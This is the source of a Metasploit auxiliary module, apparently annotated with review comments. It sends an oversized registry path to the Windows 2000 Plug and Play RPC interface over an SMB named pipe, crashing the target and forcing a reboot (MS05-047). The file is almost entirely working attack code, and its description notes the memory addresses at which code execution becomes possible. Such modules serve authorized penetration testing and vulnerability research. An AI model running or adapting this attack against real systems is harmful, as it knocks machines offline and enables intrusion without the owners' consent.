GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary denial-of-service module for the Microsoft Plug and Play
# service registry overflow (CVE-2005-2120 / MS05-047).
#
# The module binds to the PnP DCERPC interface over an SMB named pipe and
# issues a single call to opnum 0x0a carrying an oversized registry path.
# Per the module description the affected target is Windows 2000, no
# valid user account is needed, and the expected result is a forced
# reboot of the target (stability note CRASH_OS_RESTARTS).
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Auxiliary::Dos

  # Registers the module metadata (name, description, author, references,
  # stability notes) and the single SMBPIPE option.
  #
  # @param info [Hash] metadata merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft Plug and Play Service Registry Overflow',
        'Description' => %q{
          This module triggers a stack buffer overflow in the Windows Plug
          and Play service. This vulnerability can be exploited on
          Windows 2000 without a valid user account. Since the PnP
          service runs inside the service.exe process, this module
          will result in a forced reboot on Windows 2000. Obtaining
          code execution is possible if user-controlled memory can
          be placed at 0x00000030, 0x0030005C, or 0x005C005C.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-2120' ],
          [ 'MSB', 'MS05-047' ],
          [ 'BID', '15065' ],
          [ 'OSVDB', '18830' ]
        ],
        'Notes' => {
          # Running this module is expected to reboot the target.
          'Stability' => [CRASH_OS_RESTARTS],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        # Named pipe used to reach the PnP RPC interface; the default is
        # 'browser', the other listed pipes are alternatives.
        OptString.new('SMBPIPE', [ true, 'The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)', 'browser']),
      ]
    )
  end

  # IDL of the PnP function called by #run (opnum 0x0a), as recorded by
  # the module author.
=begin

/* Function 0x0a at 0x767a54a8 */
long function_0a (
  [in] [unique] [string] wchar_t * arg_00,
  [out] [size_is(*arg_02)] [length_is(*arg_02)] wchar_t * arg_01,
  [in,out] long * arg_02,
  [in] long arg_03
);

=end

  # Connects to the target's SMB service, binds to the PnP DCERPC
  # interface over the pipe named in SMBPIPE, and issues one call to
  # opnum 0x0a whose registry-path argument is padded with backslashes.
  #
  # A missing response, a connection reset, or a STATUS_PIPE_DISCONNECTED
  # error are all reported as the expected outcome; any other
  # StandardError is re-raised.
  #
  # @return [void]
  # @raise [StandardError] any DCERPC error other than a pipe disconnect
  def run
    # Determine which pipe to use
    pipe = datastore['SMBPIPE']

    print_status('Connecting to the SMB service...')
    connect
    smb_login

    # Results of testing on Windows 2000 SP0
    # 324 / 325 exception handled
    # 326 write to 0
    # 327 jump to 00000030
    # 328 jump to 0030005C
    # 329 jump to 005C005C
    # (presumably the values above are backslash counts for the path
    # padding below; the module uses a much larger count — verify)

    # Completely smash the process stack
    # Number of backslashes appended to the registry path.
    i = 1024

    # Bind to the PnP RPC interface (UUID below) over the selected pipe.
    handle = dcerpc_handle('8d9f4e40-a03d-11ce-8f69-08003e30051b', '1.0', 'ncacn_np', ["\\#{pipe}"])
    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    # Oversized registry path: a fixed prefix followed by i backslashes.
    path = 'HTREE\\ROOT' + ('\\' * i)

    # 0 = nil, 1 = enum, 2/3 = services, 4 = enum (currentcontrolset|caps)

    # NDR-encoded stub for opnum 0x0a: a random referent id, the wide
    # string path, then two longs (presumably arg_02 and arg_03 of the
    # IDL above — verify).
    stubdata =
      NDR.long(rand(0xffffffff)) +
      NDR.wstring(path) +
      NDR.long(4) +
      NDR.long(1) +
      # NOTE(review): the trailing '+' on the line above makes the return
      # value of print_status part of stubdata (appended if it returns the
      # printed string, TypeError if it returns nil) — confirm whether this
      # is intended or a leftover operator.
      print_status('Calling the vulnerable function...')

    begin
      dcerpc.call(0x0a, stubdata)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
      # No reply from the target is the expected result of the crash.
      print_good('Server did not respond, this is expected')
    rescue ::Errno::ECONNRESET
      print_good('Connection reset by peer (possible success)')
    rescue StandardError => e
      # Only a pipe disconnect is treated as success; anything else is
      # propagated to the caller unchanged.
      if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
        print_good('Server disconnected, this is expected')
      else
        raise e
      end
    end

    # NOTE(review): not reached when the StandardError branch above
    # re-raises; an ensure block would guarantee the session is closed.
    disconnect
  end
end